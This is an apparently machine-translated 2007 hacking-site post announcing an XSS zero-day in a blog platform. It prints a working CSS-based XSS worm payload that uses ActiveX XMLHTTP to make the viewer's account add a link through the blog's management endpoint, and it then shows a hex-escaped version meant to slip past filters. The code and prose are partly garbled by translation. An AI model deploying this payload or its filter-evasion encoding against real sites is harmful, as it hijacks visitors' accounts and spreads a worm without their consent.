XSS 0DAY-vulnerability warning-the black bar safety net

2007-01-06T00:00:00
ID MYHACK58:62200713617
Type myhack58
Reporter 佚名
Modified 2007-01-06T00:00:00

Description

See dream light out! I also do not hide!

1 0 On 7, When I sent the logs,prompting everyone! Here was the last issued byXSS WORM beginning to try to continue it.

Actually very simple,is two times the transfer code.

<DIV STYLE="background-image: url(javascript:var XmlHttp=new ActiveXObject("Microsoft. XMLhttp"); XmlHttp. Open("get","/manage/use. do? m=add&title=S0n9%20bl09&desc=This%20is%20XSS%20TEST%2 0% 2 1&link=http%3A//s0n9. blog. sohu. com&_",true); XmlHttp. send(null);)">

ASCII transcoding reference <http://s0n9.blog.sohu.com/16002288.html>

Written as the following 1 6 hexadecimal escape string

<div style="background-image:\0 0 7 5\0 0 7 2\006C\0 0 2 8\006A\0 0 6 1\0 0 7 6\0 0 6 1\0 0 7 3\0 0 6 3\0 0 7 2\0 0 6 9\0 0 7 0\0 0 7 4\003A\0 0 6 5\0 0 7 6\0 0 6 1\006C\0 0 2 8\0 0 5 3\0 0 7 4\0 0 7 2\0 0 6 9\006E\0 0 6 7\002E\0 0 6 6\0 0 7 2\006F\006D\0 0 4 3\0 0 6 8\0 0 6 1\0 0 7 2\0 0 4 3\006F\0 0 6......"& gt;</div>

This method can also be used for other style sheet properties.